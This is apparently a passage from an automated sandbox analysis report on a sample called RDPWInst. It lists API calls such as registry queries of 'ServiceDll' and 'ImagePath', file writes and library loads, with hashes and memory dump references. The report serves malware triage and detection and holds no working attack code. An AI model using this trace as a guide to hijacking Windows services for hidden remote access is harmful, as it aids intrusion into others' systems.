                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: ServiceDll
                                                    • API String ID: 3702945584-3252591312
                                                    • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                    • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                    • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                    • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                    APIs
                                                      • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: $sD
                                                    • API String ID: 47109696-3047594130
                                                    • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                    • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                    • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                    • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: ImagePath
                                                    • API String ID: 3660427363-1008103227
                                                    • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                    • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                    • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                    • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateOpen
                                                    • String ID:
                                                    • API String ID: 436179556-0
                                                    • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                    • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                    • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                    • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                      • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                      • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                    • String ID:
                                                    • API String ID: 2912033995-0
                                                    • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                    • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                    • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                    • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                    • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                    • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                    • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                    • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID:
                                                    • API String ID: 442123175-0
                                                    • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                    • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                    • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                    • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                    APIs
                                                    • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                    • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCompareExchangeHandleInterlocked
                                                    • String ID:
                                                    • API String ID: 190309047-0
                                                    • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                    • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                    • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                    • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                    APIs
                                                    • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                    • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFlush
                                                    • String ID:
                                                    • API String ID: 320916635-0
                                                    • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                    • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                    • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                    • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                    • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                    • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                    • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                      • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                      • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 4113206344-0
                                                    • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                    • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                    • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                    • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                    • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                    • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                    • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                    • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                    • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                    • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                    APIs
                                                    • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoNativeSystem
                                                    • String ID:
                                                    • API String ID: 1721193555-0
                                                    • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                    • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                    • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                    • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                    • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                    • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                    • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                    APIs
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateDirectory
                                                    • String ID:
                                                    • API String ID: 4241100979-0
                                                    • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                    • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
                                                    • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                    • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                    APIs
                                                    • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
